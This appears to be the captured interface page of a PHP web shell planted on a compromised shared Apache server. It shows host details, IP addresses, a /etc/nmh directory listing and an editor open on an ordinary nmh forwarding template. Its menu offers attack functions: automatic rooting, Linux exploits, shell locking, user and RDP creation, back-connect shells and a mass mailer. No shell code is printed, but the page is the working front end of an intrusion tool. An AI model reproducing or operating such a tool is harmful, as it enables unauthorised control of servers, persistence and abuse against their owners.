Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
nmh /
[ HOME SHELL ]
Name
Size
Permission
Action
MailAliases
1.27
KB
-rw-r--r--
bash_completion_nmh
11.05
KB
-rw-r--r--
components
827
B
-rw-r--r--
digestcomps
789
B
-rw-r--r--
distcomps
672
B
-rw-r--r--
forwcomps
1.21
KB
-rw-r--r--
mhical.12hour
2.05
KB
-rw-r--r--
mhical.24hour
2.06
KB
-rw-r--r--
mhl.body
46
B
-rw-r--r--
mhl.digest
193
B
-rw-r--r--
mhl.format
411
B
-rw-r--r--
mhl.forward
284
B
-rw-r--r--
mhl.headers
447
B
-rw-r--r--
mhl.reply
196
B
-rw-r--r--
mhl.replywithoutbody
175
B
-rw-r--r--
mhn.defaults
4.44
KB
-rw-r--r--
mhshow.marker
304
B
-rw-r--r--
mts.conf
1.78
KB
-rw-r--r--
rcvdistcomps
141
B
-rw-r--r--
rcvdistcomps.outbox
161
B
-rw-r--r--
replcomps
1.41
KB
-rw-r--r--
replgroupcomps
1.46
KB
-rw-r--r--
scan.MMDDYY
397
B
-rw-r--r--
scan.YYYYMMDD
381
B
-rw-r--r--
scan.curses
2.02
KB
-rw-r--r--
scan.default
473
B
-rw-r--r--
scan.highlighted
1.46
KB
-rw-r--r--
scan.mailx
291
B
-rw-r--r--
scan.nomime
378
B
-rw-r--r--
scan.size
263
B
-rw-r--r--
scan.time
302
B
-rw-r--r--
scan.timely
422
B
-rw-r--r--
scan.unseen
270
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forwcomps
%; forwcomps - Our components file when we're using "forw" %; %; We want people to be able to use the components from forwarded %; messages in this file, so we have to cheat a bit. We create a series %; of pseudo-components with a "nmh" prefix to represent arguments given %; on the command line. We don't do this for %{fcc} since there's already %; precedence for this from "repl". %; %; If we're given multiple messages to forward, provide the components %; from the first one. Can't really think of anything better to do there. %; %; Generate a "From:" header; if we don't give one, use %(localmbox) %; %<{nmh-from}%|%(void(localmbox))%>%(void(width))%(putaddr From: ) %; %; Generate To: and cc: headers; if we're given ones, put something in there %; otherwise leave them blank. %; %<{nmh-to}%(void(width))%(putaddr To: )%|To:%> %<{nmh-cc}%(void(width))%(putaddr cc: )%|cc:%> %; %; If we're not given a -fcc switch, then default to +outbox %; Fcc: %<{fcc}%(putstr)%|+outbox%> %; %; If we're not given a -subject switch, then use the original message %; subject, but adding (fwd) on the end. I got this idea from exmh, and %; I've always liked it. %; Subject:%<{nmh-subject} %(trim)%(putlit)%?{subject} %(trim)%(putlit) (fwd)%> --------
Close